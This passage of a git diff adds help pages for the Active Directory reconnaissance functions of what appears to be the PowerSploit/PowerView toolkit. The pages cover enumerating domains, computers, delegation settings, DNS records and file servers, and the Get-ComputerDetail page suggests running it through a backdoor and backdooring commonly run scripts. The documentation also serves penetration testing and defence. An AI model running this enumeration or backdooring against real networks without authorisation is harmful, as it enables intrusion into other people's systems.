(in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +Computer dnshostnames the current user has administrative access to. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ComputerDetail.md b/docs/Recon/Get-ComputerDetail.md new file mode 100755 index 00000000..15a3feb5 --- /dev/null +++ b/docs/Recon/Get-ComputerDetail.md @@ -0,0 +1,68 @@ +# Get-ComputerDetail + +## SYNOPSIS +This script is used to get useful information from a computer. + +Function: Get-ComputerDetail +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-ComputerDetail [-ToString] +``` + +## DESCRIPTION +This script is used to get useful information from a computer. +Currently, the script gets the following information: +-Explicit Credential Logons (Event ID 4648) +-Logon events (Event ID 4624) +-AppLocker logs to find what processes are created +-PowerShell logs to find PowerShell scripts which have been executed +-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ComputerDetail +``` + +Gets information about the computer and outputs it as PowerShell objects. + +Get-ComputerDetail -ToString +Gets information about the computer and outputs it as raw text. + +## PARAMETERS + +### -ToString +Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. + +## RELATED LINKS + +[Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell) + diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md new file mode 100755 index 00000000..aa8098ce --- /dev/null +++ b/docs/Recon/Get-Domain.md @@ -0,0 +1,81 @@ +# Get-Domain + +## SYNOPSIS +Returns the domain object for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-Domain [[-Domain] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Domain -Domain testlab.local +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain name to query for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +A complex .NET domain object. + +## NOTES + +## RELATED LINKS + +[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG) + diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md new file mode 100755 index 00000000..562f7698 --- /dev/null +++ b/docs/Recon/Get-DomainComputer.md @@ -0,0 +1,426 @@ +# Get-DomainComputer + +## SYNOPSIS +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainComputer [[-Identity] ] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN ] + [-OperatingSystem ] [-ServicePack ] [-SiteName ] [-Ping] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all computer objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainComputer +``` + +Returns the current computers in current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer -SPN mssql* -Domain testlab.local +``` + +Returns all MS SQL servers in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained +``` + +Search the specified OU for computeres that allow unconstrained delegation. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. +CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SamAccountName, Name, DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Unconstrained +Switch. +Return computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TrustedToAuth +Switch. +Return computer objects that are trusted to authenticate for other principals. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Printers +Switch. +Return only printers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SPN +Return computers with a specific service principal name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePrincipalName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OperatingSystem +Return computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServicePack +Return computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SiteName +Return computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ping +Switch. +Ping each host to ensure it's up before enumerating. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md new file mode 100755 index 00000000..3d15f5c4 --- /dev/null +++ b/docs/Recon/Get-DomainController.md @@ -0,0 +1,132 @@ +# Get-DomainController + +## SYNOPSIS +Return the domain controllers for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain + +## SYNTAX + +``` +Get-DomainController [[-Domain] ] [-Server ] [-LDAP] [-Credential ] +``` + +## DESCRIPTION +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. +The -LDAP switch uses Get-DomainComputer +to search for domain controllers. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainController -Domain 'test.local' +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController -Domain 'test.local' -LDAP +``` + +Determine the domain controllers for 'test.local' using LDAP queries. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'test.local' | Get-DomainController +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for domain controllers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +Switch. +Use LDAP queries to determine the domain controllers instead of built in .NET methods. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. + +System.DirectoryServices.ActiveDirectory.DomainController + +If -LDAP isn't specified. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md new file mode 100755 index 00000000..ce332754 --- /dev/null +++ b/docs/Recon/Get-DomainDFSShare.md @@ -0,0 +1,202 @@ +# Get-DomainDFSShare + +## SYNOPSIS +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domain. + +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainDFSShare [[-Domain] ] [[-SearchBase] ] [[-Server] ] + [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] [-Tombstone] + [[-Credential] ] [[-Version] ] +``` + +## DESCRIPTION +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDFSShare +``` + +Returns all distributed file system shares for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDFSShare -Domain testlab.local +``` + +Returns all distributed file system shares for the 'testlab.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Version +{{Fill Version Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md new file mode 100755 index 00000000..e444fd5a --- /dev/null +++ b/docs/Recon/Get-DomainDNSRecord.md @@ -0,0 +1,181 @@ +# Get-DomainDNSRecord + +## SYNOPSIS +Enumerates the Active Directory DNS records for a given zone. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord + +## SYNTAX + +``` +Get-DomainDNSRecord [-ZoneName] [-Domain ] [-Server ] [-Properties ] + [-ResultPageSize ] [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. +Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSRecord -ZoneName testlab.local +``` + +Retrieve all records for the testlab.local zone. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone | Get-DomainDNSRecord +``` + +Retrieve all records for all zones in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local +``` + +Retrieve all records for all zones in the dev.testlab.local domain. + +## PARAMETERS + +### -ZoneName +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md new file mode 100755 index 00000000..7065b261 --- /dev/null +++ b/docs/Recon/Get-DomainDNSZone.md @@ -0,0 +1,156 @@ +# Get-DomainDNSZone + +## SYNOPSIS +Enumerates the Active Directory DNS zones for a given domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainDNSZone [[-Domain] ] [-Server ] [-Properties ] [-ResultPageSize ] + [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSZone +``` + +Retrieves the DNS zones for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local +``` + +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. + +## PARAMETERS + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSZone + +Outputs custom PSObjects with detailed information about the DNS zone. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md new file mode 100755 index 00000000..34e9f00e --- /dev/null +++ b/docs/Recon/Get-DomainFileServer.md @@ -0,0 +1,200 @@ +# Get-DomainFileServer + +## SYNOPSIS +Returns a list of servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainFileServer [[-Domain] ] [[-LDAPFilter] ] [[-SearchBase] ] + [[-Server] ] [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] + [-Tombstone] [[-Credential] ] +``` + +## DESCRIPTION +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainFileServer +``` + +Returns active file servers for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainFileServer -Domain testing.local +``` + +Returns active file servers for the 'testing.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +One or more strings representing file server names. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md new file mode 100755 index 00000000..90617747 --- /dev/null +++ b/docs/Recon/Get-DomainForeignGroupMember.md @@ -0,0 +1,238 @@ +# Get-DomainForeignGroupMember + +## SYNOPSIS +Enumerates groups with users outside of the group's domain and returns +each foreign member. +This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainForeignGroupMember [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignGroupMember +``` + +Return all group members in the current domain where the group and member differ. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignGroupMember -Domain dev.testlab.local +``` + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. +binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: 